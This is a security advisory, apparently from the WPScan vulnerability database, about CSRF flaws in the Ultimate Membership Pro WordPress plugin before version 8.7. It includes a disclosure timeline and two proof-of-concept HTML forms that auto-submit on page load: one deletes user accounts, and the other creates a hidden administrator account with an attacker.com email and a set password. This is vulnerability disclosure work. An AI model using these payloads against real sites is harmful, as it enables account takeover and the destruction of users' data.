Ultimate Membership Pro < 8.7 - Cross-Site Request Forgery allowing Arbitrary Account Deletion and Creation



Description
While confirming the issues from https://wpvulndb.com/vulnerabilities/10086 have been remediated, two CSRF issues were identified, allowing attackers to make logged in administrator delete arbitrary accounts, as well as create a new administrator account. Other CSRF may be present but haven't been checked.


February 17th, 2020 - Envato Notified
February 22nd, 2020 - New version released (8.7), fixing the reported issues, as well as putting CSRF checks on all other actions as per recommendations.
Proof of Concept
<html>
  <body onload="document.forms[0].submit();">
    <form action="https://examle.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST">
      <input type="hidden" name="ihc_limit" value="25" />
      <input type="hidden" name="delete_users[]" value="5" />
      <input type="hidden" name="delete" value="Delete" />
    </form>
  </body>
</html>


<html>
  <!-- Account will not show up in the plugin's users list (because of admin role), but will be in the WP users list -->
 <body onload="document.forms[0].submit();">
    <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user_login" value="admin-csrf" />
      <input type="hidden" name="user_email" value="admin-csrf@attacker.com" />
      <input type="hidden" name="first_name" value="Admin" />
      <input type="hidden" name="last_name" value="CSRF" />
      <input type="hidden" name="pass1" value="Passw0rd" />
      <input type="hidden" name="pass2" value="Passw0rd" />
      <input type="hidden" name="role" value="administrator" />
      <input type="hidden" name="ihc_user_levels" value="-1" />
      <input type="hidden" name="ihc_overview_post" value="-1" />
      <input type="hidden" name="Submit" value="Register" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 8.7

References

URL https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
URL https://blog.wpscan.org/wpvulndb/report/2020/03/06/ultimate-membership-pro-recent-vulnerabilities-breakdown.html

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher ErwanLR
Submitter Website https://wpscan.org
Submitter Twitter erwan_lr
Views 2024
Verified Yes
WPVDB ID 10087

Timeline

Publicly Published 2020-02-24 (5 months ago)
Added 2020-02-24 (5 months ago)
Last Updated 2020-03-07 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin